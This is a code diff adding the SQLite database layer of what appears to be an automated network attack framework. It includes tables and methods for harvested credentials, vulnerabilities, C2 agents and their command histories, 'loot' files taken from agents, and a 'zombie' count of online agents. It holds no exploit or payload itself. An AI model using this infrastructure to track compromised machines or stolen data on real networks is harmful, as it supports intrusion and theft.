return self._queue.queue_action_at(action_name, mac, ip, **kwargs)
def list_action_queue(self, statuses: Optional[Iterable[str]] = None) -> List[Dict[str, Any]]:
return self._queue.list_action_queue(statuses)
def get_upcoming_actions_summary(self) -> List[Dict[str, Any]]:
return self._queue.get_upcoming_actions_summary()
def supersede_old_attempts(self, action_name: str, mac_address: str,
port: Optional[int] = None, ref_ts: Optional[str] = None) -> int:
return self._queue.supersede_old_attempts(action_name, mac_address, port, ref_ts)
def list_attempt_history(self, action_name: str, mac_address: str,
port: Optional[int] = None, limit: int = 20) -> List[Dict[str, Any]]:
return self._queue.list_attempt_history(action_name, mac_address, port, limit)
def get_action_status_from_queue(self, action_name: str,
mac_address: Optional[str] = None) -> Optional[Dict[str, Any]]:
return self._queue.get_action_status_from_queue(action_name, mac_address)
def get_last_action_status_from_queue(self, mac_address: str, action_name: str) -> Optional[Dict[str, str]]:
return self._queue.get_last_action_status_from_queue(mac_address, action_name)
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
return self._queue.get_last_action_statuses_for_mac(mac_address)
# Vulnerability operations
def add_vulnerability(self, mac_address: str, vuln_id: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None):
return self._vulnerabilities.add_vulnerability(mac_address, vuln_id, ip, hostname, port)
def update_vulnerability_status(self, mac_address: str, current_vulns: List[str]):
return self._vulnerabilities.update_vulnerability_status(mac_address, current_vulns)
def update_vulnerability_status_by_port(self, mac_address: str, port: int, current_vulns: List[str]):
return self._vulnerabilities.update_vulnerability_status_by_port(mac_address, port, current_vulns)
def get_all_vulns(self) -> List[Dict[str, Any]]:
return self._vulnerabilities.get_all_vulns()
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
return self._vulnerabilities.save_vulnerabilities(mac, ip, findings)
def cleanup_vulnerability_duplicates(self):
return self._vulnerabilities.cleanup_vulnerability_duplicates()
def fix_vulnerability_history_nulls(self):
return self._vulnerabilities.fix_vulnerability_history_nulls()
def count_vulnerabilities_alive(self, distinct: bool = False, active_only: bool = True) -> int:
return self._vulnerabilities.count_vulnerabilities_alive(distinct, active_only)
def count_distinct_vulnerabilities(self, alive_only: bool = False) -> int:
return self._vulnerabilities.count_distinct_vulnerabilities(alive_only)
def get_vulnerabilities_for_alive_hosts(self) -> List[str]:
return self._vulnerabilities.get_vulnerabilities_for_alive_hosts()
def list_vulnerability_history(self, cve_id: str | None = None,
mac: str | None = None, limit: int = 500) -> list[dict]:
return self._vulnerabilities.list_vulnerability_history(cve_id, mac, limit)
# CVE metadata
def get_cve_meta(self, cve_id: str) -> Optional[Dict[str, Any]]:
return self._vulnerabilities.get_cve_meta(cve_id)
def upsert_cve_meta(self, meta: Dict[str, Any]) -> None:
return self._vulnerabilities.upsert_cve_meta(meta)
def get_cve_meta_bulk(self, cve_ids: List[str]) -> Dict[str, Dict[str, Any]]:
return self._vulnerabilities.get_cve_meta_bulk(cve_ids)
# Software operations
def add_detected_software(self, mac_address: str, cpe: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None) -> None:
return self._software.add_detected_software(mac_address, cpe, ip, hostname, port)
def update_detected_software_status(self, mac_address: str, current_cpes: List[str]) -> None:
return self._software.update_detected_software_status(mac_address, current_cpes)
def migrate_cpe_from_vulnerabilities(self) -> int:
return self._software.migrate_cpe_from_vulnerabilities()
# Credential operations
def insert_cred(self, service: str, mac: Optional[str] = None, ip: Optional[str] = None,
hostname: Optional[str] = None, user: Optional[str] = None,
password: Optional[str] = None, port: Optional[int] = None,
database: Optional[str] = None, extra: Optional[Dict[str, Any]] = None):
return self._credentials.insert_cred(service, mac, ip, hostname, user, password, port, database, extra)
def list_creds_grouped(self) -> List[Dict[str, Any]]:
return self._credentials.list_creds_grouped()
# Service operations
def upsert_port_service(self, mac_address: str, ip: Optional[str], port: int, **kwargs):
return self._services.upsert_port_service(mac_address, ip, port, **kwargs)
def get_services_for_host(self, mac_address: str) -> List[Dict]:
return self._services.get_services_for_host(mac_address)
def find_hosts_by_service(self, service: str) -> List[Dict]:
return self._services.find_hosts_by_service(service)
def get_service_for_host_port(self, mac_address: str, port: int, protocol: str = "tcp") -> Optional[Dict]:
return self._services.get_service_for_host_port(mac_address, port, protocol)
def _rebuild_host_ports(self, mac_address: str):
return self._services._rebuild_host_ports(mac_address)
# Script operations
def add_script(self, name: str, type_: str, path: str, main_file: Optional[str] = None,
category: Optional[str] = None, description: Optional[str] = None):
return self._scripts.add_script(name, type_, path, main_file, category, description)
def list_scripts(self) -> List[Dict[str, Any]]:
return self._scripts.list_scripts()
def delete_script(self, name: str) -> None:
return self._scripts.delete_script(name)
# Stats operations
def get_livestats(self) -> Dict[str, int]:
return self._stats.get_livestats()
def update_livestats(self, total_open_ports: int, alive_hosts_count: int,
all_known_hosts_count: int, vulnerabilities_count: int):
return self._stats.update_livestats(total_open_ports, alive_hosts_count,
all_known_hosts_count, vulnerabilities_count)
def get_stats(self) -> Dict[str, int]:
return self._stats.get_stats()
def set_stats(self, total_open_ports: int, alive_hosts_count: int,
all_known_hosts_count: int, vulnerabilities_count: int):
return self._stats.set_stats(total_open_ports, alive_hosts_count,
all_known_hosts_count, vulnerabilities_count)
def get_display_stats(self) -> Dict[str, int]:
return self._stats.get_display_stats()
def ensure_stats_initialized(self):
return self._stats.ensure_stats_initialized()
# Backup operations
def add_backup(self, filename: str, description: str, date: str, type_: str = "User Backup",
is_default: bool = False, is_restore: bool = False, is_github: bool = False):
return self._backups.add_backup(filename, description, date, type_, is_default, is_restore, is_github)
def list_backups(self) -> List[Dict[str, Any]]:
return self._backups.list_backups()
def delete_backup(self, filename: str) -> None:
return self._backups.delete_backup(filename)
def clear_default_backup(self) -> None:
return self._backups.clear_default_backup()
def set_default_backup(self, filename: str) -> None:
return self._backups.set_default_backup(filename)
# Comment operations
def count_comments(self) -> int:
return self._comments.count_comments()
def insert_comments(self, comments: List[Tuple[str, str, str, str, int]]):
return self._comments.insert_comments(comments)
def import_comments_from_json(self, json_path: str, lang: Optional[str] = None,
default_theme: str = "general", default_weight: int = 1,
clear_existing: bool = False) -> int:
return self._comments.import_comments_from_json(json_path, lang, default_theme,
default_weight, clear_existing)
def random_comment_for(self, status: str, lang: str = "en") -> Optional[Dict[str, Any]]:
return self._comments.random_comment_for(status, lang)
# Agent operations (C2)
def save_agent(self, agent_data: dict) -> None:
return self._agents.save_agent(agent_data)
def save_command(self, agent_id: str, command: str, response: str | None = None, success: bool = False) -> None:
return self._agents.save_command(agent_id, command, response, success)
def save_telemetry(self, agent_id: str, telemetry: dict) -> None:
return self._agents.save_telemetry(agent_id, telemetry)
def save_loot(self, loot: dict) -> None:
return self._agents.save_loot(loot)
def get_agent_history(self, agent_id: str) -> List[dict]:
return self._agents.get_agent_history(agent_id)
def purge_stale_agents(self, threshold_seconds: int) -> int:
return self._agents.purge_stale_agents(threshold_seconds)
def get_stale_agents(self, threshold_seconds: int) -> list[dict]:
return self._agents.get_stale_agents(threshold_seconds)
# Agent key management
def get_active_key(self, agent_id: str) -> str | None:
return self._agents.get_active_key(agent_id)
def list_keys(self, agent_id: str) -> list[dict]:
return self._agents.list_keys(agent_id)
def save_new_key(self, agent_id: str, key_b64: str) -> int:
return self._agents.save_new_key(agent_id, key_b64)
def rotate_key(self, agent_id: str, new_key_b64: str) -> int:
return self._agents.rotate_key(agent_id, new_key_b64)
def revoke_keys(self, agent_id: str) -> int:
return self._agents.revoke_keys(agent_id)
def verify_client_key(self, agent_id: str, key_b64: str) -> bool:
return self._agents.verify_client_key(agent_id, key_b64)
def migrate_keys_from_file(self, json_path: str) -> int:
return self._agents.migrate_keys_from_file(json_path)
# Studio operations
def get_studio_actions(self):
return self._studio.get_studio_actions()
def get_db_actions(self):
return self._studio.get_db_actions()
def update_studio_action(self, b_class: str, updates: dict):
return self._studio.update_studio_action(b_class, updates)
def get_studio_edges(self):
return self._studio.get_studio_edges()
def upsert_studio_edge(self, from_action: str, to_action: str, edge_type: str, metadata: dict = None):
return self._studio.upsert_studio_edge(from_action, to_action, edge_type, metadata)
def delete_studio_edge(self, edge_id: int):
return self._studio.delete_studio_edge(edge_id)
def get_studio_hosts(self, include_real: bool = True):
return self._studio.get_studio_hosts(include_real)
def upsert_studio_host(self, mac_address: str, data: dict):
return self._studio.upsert_studio_host(mac_address, data)
def delete_studio_host(self, mac: str):
return self._studio.delete_studio_host(mac)
def save_studio_layout(self, name: str, layout_data: dict, description: str = None):
return self._studio.save_studio_layout(name, layout_data, description)
def load_studio_layout(self, name: str):
return self._studio.load_studio_layout(name)
def apply_studio_to_runtime(self):
return self._studio.apply_studio_to_runtime()
def _replace_actions_studio_with_actions(self, vacuum: bool = False):
return self._studio._replace_actions_studio_with_actions(vacuum)
def _sync_actions_studio_schema_and_rows(self):
return self._studio._sync_actions_studio_schema_and_rows()
# WebEnum operations
# Add webenum methods if you have any...
# =========================================================================
# UTILITY OPERATIONS
# =========================================================================
def checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""Force a WAL checkpoint"""
return self._base.checkpoint(mode)
def wal_checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""Alias for checkpoint"""
return self.checkpoint(mode)
def optimize(self) -> None:
"""Run PRAGMA optimize"""
return self._base.optimize()
def vacuum(self) -> None:
"""Vacuum the database"""
return self._base.vacuum()
# Internal helper methods used by modules
def _table_exists(self, name: str) -> bool:
return self._base._table_exists(name)
def _column_names(self, table: str) -> List[str]:
return self._base._column_names(table)
def _ensure_column(self, table: str, column: str, ddl: str) -> None:
return self._base._ensure_column(table, column, ddl)

38
db_utils/__init__.py Normal file
View File

@@ -0,0 +1,38 @@
# db_utils/__init__.py
# Database utilities package
from .base import DatabaseBase
from .config import ConfigOps
from .hosts import HostOps
from .actions import ActionOps
from .queue import QueueOps
from .vulnerabilities import VulnerabilityOps
from .software import SoftwareOps
from .credentials import CredentialOps
from .services import ServiceOps
from .scripts import ScriptOps
from .stats import StatsOps
from .backups import BackupOps
from .comments import CommentOps
from .agents import AgentOps
from .studio import StudioOps
from .webenum import WebEnumOps
__all__ = [
'DatabaseBase',
'ConfigOps',
'HostOps',
'ActionOps',
'QueueOps',
'VulnerabilityOps',
'SoftwareOps',
'CredentialOps',
'ServiceOps',
'ScriptOps',
'StatsOps',
'BackupOps',
'CommentOps',
'AgentOps',
'StudioOps',
'WebEnumOps',
]

293
db_utils/actions.py Normal file
View File

@@ -0,0 +1,293 @@
# db_utils/actions.py
# Action definition and management operations
import json
import sqlite3
from functools import lru_cache
from typing import Any, Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.actions", level=logging.DEBUG)
class ActionOps:
"""Action definition and configuration operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create actions table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS actions (
b_class TEXT PRIMARY KEY,
b_module TEXT NOT NULL,
b_port INTEGER,
b_status TEXT,
b_parent TEXT,
b_args TEXT,
b_description TEXT,
b_name TEXT,
b_author TEXT,
b_version TEXT,
b_icon TEXT,
b_docs_url TEXT,
b_examples TEXT,
b_action TEXT DEFAULT 'normal',
b_service TEXT,
b_trigger TEXT,
b_requires TEXT,
b_priority INTEGER DEFAULT 50,
b_tags TEXT,
b_timeout INTEGER DEFAULT 300,
b_max_retries INTEGER DEFAULT 3,
b_cooldown INTEGER DEFAULT 0,
b_rate_limit TEXT,
b_stealth_level INTEGER DEFAULT 5,
b_risk_level TEXT DEFAULT 'medium',
b_enabled INTEGER DEFAULT 1
);
""")
logger.debug("Actions table created/verified")
# =========================================================================
# ACTION CRUD OPERATIONS
# =========================================================================
def sync_actions(self, actions):
"""Sync action definitions to database"""
if not actions:
return
def _as_int(x, default=None):
if x is None:
return default
if isinstance(x, (list, tuple)):
x = x[0] if x else default
try:
return int(x)
except Exception:
return default
def _as_str(x, default=None):
if x is None:
return default
if isinstance(x, (list, tuple, set, dict)):
try:
return json.dumps(list(x) if not isinstance(x, dict) else x, ensure_ascii=False)
except Exception:
return default
return str(x)
def _as_json(x):
if x is None:
return None
if isinstance(x, str):
xs = x.strip()
if (xs.startswith("{") and xs.endswith("}")) or (xs.startswith("[") and xs.endswith("]")):
return xs
return json.dumps(x, ensure_ascii=False)
try:
return json.dumps(x, ensure_ascii=False)
except Exception:
return None
with self.base.transaction():
for a in actions:
# Normalize fields
b_service = a.get("b_service")
if isinstance(b_service, (list, tuple, set, dict)):
b_service = json.dumps(list(b_service) if not isinstance(b_service, dict) else b_service, ensure_ascii=False)
b_tags = a.get("b_tags")
if isinstance(b_tags, (list, tuple, set, dict)):
b_tags = json.dumps(list(b_tags) if not isinstance(b_tags, dict) else b_tags, ensure_ascii=False)
b_trigger = a.get("b_trigger")
if isinstance(b_trigger, (list, tuple, set, dict)):
b_trigger = json.dumps(b_trigger, ensure_ascii=False)
b_requires = a.get("b_requires")
if isinstance(b_requires, (list, tuple, set, dict)):
b_requires = json.dumps(b_requires, ensure_ascii=False)
b_args_json = _as_json(a.get("b_args"))
# Enriched metadata
b_name = _as_str(a.get("b_name"))
b_description = _as_str(a.get("b_description"))
b_author = _as_str(a.get("b_author"))
b_version = _as_str(a.get("b_version"))
b_icon = _as_str(a.get("b_icon"))
b_docs_url = _as_str(a.get("b_docs_url"))
b_examples = _as_json(a.get("b_examples"))
# Typed fields
b_port = _as_int(a.get("b_port"))
b_priority = _as_int(a.get("b_priority"), 50)
b_timeout = _as_int(a.get("b_timeout"), 300)
b_max_retries = _as_int(a.get("b_max_retries"), 3)
b_cooldown = _as_int(a.get("b_cooldown"), 0)
b_stealth_level = _as_int(a.get("b_stealth_level"), 5)
b_enabled = _as_int(a.get("b_enabled"), 1)
b_rate_limit = _as_str(a.get("b_rate_limit"))
b_risk_level = _as_str(a.get("b_risk_level"), "medium")
self.base.execute("""
INSERT INTO actions (
b_class,b_module,b_port,b_status,b_parent,
b_action,b_service,b_trigger,b_requires,b_priority,
b_tags,b_timeout,b_max_retries,b_cooldown,b_rate_limit,
b_stealth_level,b_risk_level,b_enabled,
b_args,
b_name, b_description, b_author, b_version, b_icon, b_docs_url, b_examples
) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,
?,?,?,?,?,?,?)
ON CONFLICT(b_class) DO UPDATE SET
b_module = excluded.b_module,
b_port = COALESCE(excluded.b_port, actions.b_port),
b_status = COALESCE(excluded.b_status, actions.b_status),
b_parent = COALESCE(excluded.b_parent, actions.b_parent),
b_action = COALESCE(excluded.b_action, actions.b_action),
b_service = COALESCE(excluded.b_service, actions.b_service),
b_trigger = COALESCE(excluded.b_trigger, actions.b_trigger),
b_requires = COALESCE(excluded.b_requires, actions.b_requires),
b_priority = COALESCE(excluded.b_priority, actions.b_priority),
b_tags = COALESCE(excluded.b_tags, actions.b_tags),
b_timeout = COALESCE(excluded.b_timeout, actions.b_timeout),
b_max_retries = COALESCE(excluded.b_max_retries, actions.b_max_retries),
b_cooldown = COALESCE(excluded.b_cooldown, actions.b_cooldown),
b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit),
b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level),
b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level),
b_enabled = COALESCE(excluded.b_enabled, actions.b_enabled),
b_args = COALESCE(excluded.b_args, actions.b_args),
b_name = COALESCE(excluded.b_name, actions.b_name),
b_description = COALESCE(excluded.b_description, actions.b_description),
b_author = COALESCE(excluded.b_author, actions.b_author),
b_version = COALESCE(excluded.b_version, actions.b_version),
b_icon = COALESCE(excluded.b_icon, actions.b_icon),
b_docs_url = COALESCE(excluded.b_docs_url, actions.b_docs_url),
b_examples = COALESCE(excluded.b_examples, actions.b_examples)
""", (
a.get("b_class"),
a.get("b_module"),
b_port,
a.get("b_status"),
a.get("b_parent"),
a.get("b_action", "normal"),
b_service,
b_trigger,
b_requires,
b_priority,
b_tags,
b_timeout,
b_max_retries,
b_cooldown,
b_rate_limit,
b_stealth_level,
b_risk_level,
b_enabled,
b_args_json,
b_name,
b_description,
b_author,
b_version,
b_icon,
b_docs_url,
b_examples
))
# Update action counter in stats
action_count_row = self.base.query_one("SELECT COUNT(*) as cnt FROM actions WHERE b_enabled = 1")
if action_count_row:
try:
self.base.execute("""
UPDATE stats
SET actions_count = ?
WHERE id = 1
""", (action_count_row['cnt'],))
except sqlite3.OperationalError:
# Column doesn't exist yet, add it
self.base.execute("ALTER TABLE stats ADD COLUMN actions_count INTEGER DEFAULT 0")
self.base.execute("""
UPDATE stats
SET actions_count = ?
WHERE id = 1
""", (action_count_row['cnt'],))
logger.info(f"Synchronized {len(actions)} actions")
def list_actions(self):
"""List all action definitions ordered by class name"""
return self.base.query("SELECT * FROM actions ORDER BY b_class;")
def list_studio_actions(self):
"""List all studio action definitions"""
return self.base.query("SELECT * FROM actions_studio ORDER BY b_class;")
def get_action_by_class(self, b_class: str) -> dict | None:
"""Get action by class name"""
rows = self.base.query("SELECT * FROM actions WHERE b_class=? LIMIT 1;", (b_class,))
return rows[0] if rows else None
def delete_action(self, b_class: str) -> None:
"""Delete action by class name"""
self.base.execute("DELETE FROM actions WHERE b_class=?;", (b_class,))
def upsert_simple_action(self, *, b_class: str, b_module: str, **kw) -> None:
"""Minimal upsert of an action by reusing sync_actions"""
rec = {"b_class": b_class, "b_module": b_module}
rec.update(kw)
self.sync_actions([rec])
def list_action_cards(self) -> list[dict]:
"""Lightweight descriptor of actions for card-based UIs"""
rows = self.base.query("""
SELECT b_class, COALESCE(b_enabled, 0) AS b_enabled
FROM actions
ORDER BY b_class;
""")
out = []
for r in rows:
cls = r["b_class"]
enabled = int(r["b_enabled"]) # 0 reste 0
out.append({
"name": cls,
"image": f"/actions/actions_icons/{cls}.png",
"enabled": enabled,
})
return out
# def list_action_cards(self) -> list[dict]:
# """Lightweight descriptor of actions for card-based UIs"""
# rows = self.base.query("""
# SELECT b_class, b_enabled
# FROM actions
# ORDER BY b_class;
# """)
# out = []
# for r in rows:
# cls = r["b_class"]
# out.append({
# "name": cls,
# "image": f"/actions/actions_icons/{cls}.png",
# "enabled": int(r.get("b_enabled", 1) or 1),
# })
# return out
@lru_cache(maxsize=32)
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
"""Cached lookup of an action definition by class name"""
row = self.base.query("SELECT * FROM actions WHERE b_class=? LIMIT 1;", (b_class,))
if not row:
return None
r = row[0]
if r.get("b_args"):
try:
r["b_args"] = json.loads(r["b_args"])
except Exception:
pass
return r

369
db_utils/agents.py Normal file
View File

@@ -0,0 +1,369 @@
# db_utils/agents.py
# C2 (Command & Control) agent management operations
import json
import os
import sqlite3
from typing import List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.agents", level=logging.DEBUG)
class AgentOps:
"""C2 agent tracking and command history operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create C2 agent tables"""
# Agents table
self.base.execute("""
CREATE TABLE IF NOT EXISTS agents (
id TEXT PRIMARY KEY,
hostname TEXT,
platform TEXT,
os_version TEXT,
architecture TEXT,
ip_address TEXT,
first_seen TIMESTAMP,
last_seen TIMESTAMP,
status TEXT,
notes TEXT
);
""")
# Indexes for performance
self.base.execute("CREATE INDEX IF NOT EXISTS idx_agents_last_seen ON agents(last_seen);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_agents_status ON agents(status);")
# Commands table
self.base.execute("""
CREATE TABLE IF NOT EXISTS commands (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT,
command TEXT,
timestamp TIMESTAMP,
response TEXT,
success BOOLEAN,
FOREIGN KEY (agent_id) REFERENCES agents (id)
);
""")
# Agent keys (versioned for rotation)
self.base.execute("""
CREATE TABLE IF NOT EXISTS agent_keys (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT NOT NULL,
key_b64 TEXT NOT NULL,
version INTEGER NOT NULL,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
rotated_at TIMESTAMP,
revoked_at TIMESTAMP,
active INTEGER DEFAULT 1,
UNIQUE(agent_id, version)
);
""")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_agent_keys_active ON agent_keys(agent_id, active);")
# Loot table
self.base.execute("""
CREATE TABLE IF NOT EXISTS loot (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT,
filename TEXT,
filepath TEXT,
size INTEGER,
timestamp TIMESTAMP,
hash TEXT,
FOREIGN KEY (agent_id) REFERENCES agents (id)
);
""")
# Telemetry table
self.base.execute("""
CREATE TABLE IF NOT EXISTS telemetry (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT,
cpu_percent REAL,
mem_percent REAL,
disk_percent REAL,
uptime INTEGER,
timestamp TIMESTAMP,
FOREIGN KEY (agent_id) REFERENCES agents (id)
);
""")
logger.debug("C2 agent tables created/verified")
# =========================================================================
# AGENT OPERATIONS
# =========================================================================
def save_agent(self, agent_data: dict) -> None:
"""
Upsert an agent preserving first_seen and updating last_seen.
Status field expected as str (e.g. 'online'/'offline').
"""
agent_id = agent_data.get('id')
hostname = agent_data.get('hostname')
platform_ = agent_data.get('platform')
os_version = agent_data.get('os_version')
arch = agent_data.get('architecture')
ip_address = agent_data.get('ip_address')
status = agent_data.get('status') or 'offline'
notes = agent_data.get('notes')
if not agent_id:
raise ValueError("save_agent: 'id' is required in agent_data")
# Upsert that preserves first_seen and updates last_seen to NOW
self.base.execute("""
INSERT INTO agents (id, hostname, platform, os_version, architecture, ip_address,
first_seen, last_seen, status, notes)
VALUES (?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP, ?, ?)
ON CONFLICT(id) DO UPDATE SET
hostname = COALESCE(excluded.hostname, agents.hostname),
platform = COALESCE(excluded.platform, agents.platform),
os_version = COALESCE(excluded.os_version, agents.os_version),
architecture = COALESCE(excluded.architecture, agents.architecture),
ip_address = COALESCE(excluded.ip_address, agents.ip_address),
first_seen = COALESCE(agents.first_seen, excluded.first_seen, CURRENT_TIMESTAMP),
last_seen = CURRENT_TIMESTAMP,
status = COALESCE(excluded.status, agents.status),
notes = COALESCE(excluded.notes, agents.notes)
""", (agent_id, hostname, platform_, os_version, arch, ip_address, status, notes))
# Optionally refresh zombie counter
try:
self._refresh_zombie_counter()
except Exception:
pass
def save_command(self, agent_id: str, command: str,
response: str | None = None, success: bool = False) -> None:
"""Record a command history entry"""
if not agent_id or not command:
raise ValueError("save_command: 'agent_id' and 'command' are required")
self.base.execute("""
INSERT INTO commands (agent_id, command, timestamp, response, success)
VALUES (?, ?, CURRENT_TIMESTAMP, ?, ?)
""", (agent_id, command, response, 1 if success else 0))
def save_telemetry(self, agent_id: str, telemetry: dict) -> None:
"""Record a telemetry snapshot for an agent"""
if not agent_id:
raise ValueError("save_telemetry: 'agent_id' is required")
self.base.execute("""
INSERT INTO telemetry (agent_id, cpu_percent, mem_percent, disk_percent, uptime, timestamp)
VALUES (?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
""", (
agent_id,
telemetry.get('cpu_percent'),
telemetry.get('mem_percent'),
telemetry.get('disk_percent'),
telemetry.get('uptime')
))
def save_loot(self, loot: dict) -> None:
"""
Record a retrieved file (loot).
Expected: {'agent_id', 'filename', 'filepath', 'size', 'hash'}
Timestamp is added database-side.
"""
if not loot or not loot.get('agent_id') or not loot.get('filename'):
raise ValueError("save_loot: 'agent_id' and 'filename' are required")
self.base.execute("""
INSERT INTO loot (agent_id, filename, filepath, size, timestamp, hash)
VALUES (?, ?, ?, ?, CURRENT_TIMESTAMP, ?)
""", (
loot.get('agent_id'),
loot.get('filename'),
loot.get('filepath'),
int(loot.get('size') or 0),
loot.get('hash')
))
def get_agent_history(self, agent_id: str) -> List[dict]:
"""
Return the 100 most recent commands for an agent (most recent first).
"""
if not agent_id:
return []
rows = self.base.query("""
SELECT command, timestamp, response, success
FROM commands
WHERE agent_id = ?
ORDER BY datetime(timestamp) DESC
LIMIT 100
""", (agent_id,))
# Normalize success to bool
for r in rows:
r['success'] = bool(r.get('success'))
return rows
def purge_stale_agents(self, threshold_seconds: int) -> int:
"""
Delete agents whose last_seen is older than now - threshold_seconds.
Returns the number of deleted rows.
"""
if not threshold_seconds or threshold_seconds <= 0:
return 0
return self.base.execute("""
DELETE FROM agents
WHERE last_seen IS NOT NULL
AND datetime(last_seen) < datetime('now', ?)
""", (f'-{threshold_seconds} seconds',))
def get_stale_agents(self, threshold_seconds: int) -> list[dict]:
"""
Return the list of agents whose last_seen is older than now - threshold_seconds.
Useful for detecting/purging inactive agents.
"""
if not threshold_seconds or threshold_seconds <= 0:
return []
rows = self.base.query("""
SELECT *
FROM agents
WHERE last_seen IS NOT NULL
AND datetime(last_seen) < datetime('now', ?)
""", (f'-{threshold_seconds} seconds',))
return rows or []
# =========================================================================
# AGENT KEY MANAGEMENT
# =========================================================================
def get_active_key(self, agent_id: str) -> str | None:
"""Return the active key (base64) for an agent, or None"""
row = self.base.query_one("""
SELECT key_b64 FROM agent_keys
WHERE agent_id=? AND active=1
ORDER BY version DESC
LIMIT 1
""", (agent_id,))
return row["key_b64"] if row else None
def list_keys(self, agent_id: str) -> list[dict]:
"""List all keys for an agent (versions, states)"""
return self.base.query("""
SELECT id, agent_id, key_b64, version, created_at, rotated_at, revoked_at, active
FROM agent_keys
WHERE agent_id=?
ORDER BY version DESC
""", (agent_id,))
def _next_key_version(self, agent_id: str) -> int:
"""Get next key version number for an agent"""
row = self.base.query_one("SELECT COALESCE(MAX(version),0) AS v FROM agent_keys WHERE agent_id=?", (agent_id,))
return int(row["v"] or 0) + 1
def save_new_key(self, agent_id: str, key_b64: str) -> int:
"""
Record a first key for an agent (if no existing key).
Returns the version created.
"""
v = self._next_key_version(agent_id)
self.base.execute("""
INSERT INTO agent_keys(agent_id, key_b64, version, active)
VALUES(?,?,?,1)
""", (agent_id, key_b64, v))
return v
def rotate_key(self, agent_id: str, new_key_b64: str) -> int:
"""
Rotation: disable old active key (rotated_at), insert new one in version+1 active=1.
Returns the new version.
"""
with self.base.transaction():
# Disable existing active key
self.base.execute("""
UPDATE agent_keys
SET active=0, rotated_at=CURRENT_TIMESTAMP
WHERE agent_id=? AND active=1
""", (agent_id,))
# Insert new
v = self._next_key_version(agent_id)
self.base.execute("""
INSERT INTO agent_keys(agent_id, key_b64, version, active)
VALUES(?,?,?,1)
""", (agent_id, new_key_b64, v))
return v
def revoke_keys(self, agent_id: str) -> int:
"""
Total revocation: active=0 + revoked_at now for all agent keys.
Returns the number of affected rows.
"""
return self.base.execute("""
UPDATE agent_keys
SET active=0, revoked_at=CURRENT_TIMESTAMP
WHERE agent_id=? AND active=1
""", (agent_id,))
def verify_client_key(self, agent_id: str, key_b64: str) -> bool:
"""True if the provided key matches an active key for this agent"""
row = self.base.query_one("""
SELECT 1 FROM agent_keys
WHERE agent_id=? AND key_b64=? AND active=1
LIMIT 1
""", (agent_id, key_b64))
return bool(row)
def migrate_keys_from_file(self, json_path: str) -> int:
"""
One-shot migration from a keys.json in format {agent_id: key_b64}.
For each agent: if no active key, create it in version 1.
Returns the number of keys inserted.
"""
if not json_path or not os.path.exists(json_path):
return 0
inserted = 0
try:
with open(json_path, "r", encoding="utf-8") as f:
data = json.load(f)
if not isinstance(data, dict):
return 0
with self.base.transaction():
for agent_id, key_b64 in data.items():
if not self.get_active_key(agent_id):
self.save_new_key(agent_id, key_b64)
inserted += 1
except Exception:
pass
return inserted
# =========================================================================
# HELPER METHODS
# =========================================================================
def _refresh_zombie_counter(self) -> None:
"""
Update stats.zombie_count with the number of online agents.
Won't fail if the column doesn't exist yet.
"""
try:
row = self.base.query_one("SELECT COUNT(*) AS c FROM agents WHERE LOWER(status)='online';")
count = int(row['c'] if row else 0)
updated = self.base.execute("UPDATE stats SET zombie_count=? WHERE id=1;", (count,))
if not updated:
# Ensure singleton row exists
self.base.execute("INSERT OR IGNORE INTO stats(id) VALUES(1);")
self.base.execute("UPDATE stats SET zombie_count=? WHERE id=1;", (count,))
except sqlite3.OperationalError:
# Column absent: add it properly and retry
try:
self.base.execute("ALTER TABLE stats ADD COLUMN zombie_count INTEGER DEFAULT 0;")
self.base.execute("UPDATE stats SET zombie_count=0 WHERE id=1;")
row = self.base.query_one("SELECT COUNT(*) AS c FROM agents WHERE LOWER(status)='online';")
count = int(row['c'] if row else 0)
self.base.execute("UPDATE stats SET zombie_count=? WHERE id=1;", (count,))
except Exception:
pass

76
db_utils/backups.py Normal file
View File

@@ -0,0 +1,76 @@
# db_utils/backups.py
# Backup registry and management operations
from typing import Any, Dict, List
import logging
from logger import Logger
logger = Logger(name="db_utils.backups", level=logging.DEBUG)
class BackupOps:
"""Backup registry and management operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create backups registry table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS backups (
id INTEGER PRIMARY KEY AUTOINCREMENT,
filename TEXT UNIQUE NOT NULL,
description TEXT,
date TEXT,
type TEXT DEFAULT 'User Backup',
is_default INTEGER DEFAULT 0,
is_restore INTEGER DEFAULT 0,
is_github INTEGER DEFAULT 0,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
logger.debug("Backups table created/verified")
# =========================================================================
# BACKUP OPERATIONS
# =========================================================================
def add_backup(self, filename: str, description: str, date: str,
type_: str = "User Backup", is_default: bool = False,
is_restore: bool = False, is_github: bool = False):
"""Insert or update a backup registry entry"""
self.base.execute("""
INSERT INTO backups(filename,description,date,type,is_default,is_restore,is_github)
VALUES(?,?,?,?,?,?,?)
ON CONFLICT(filename) DO UPDATE SET
description=excluded.description,
date=excluded.date,
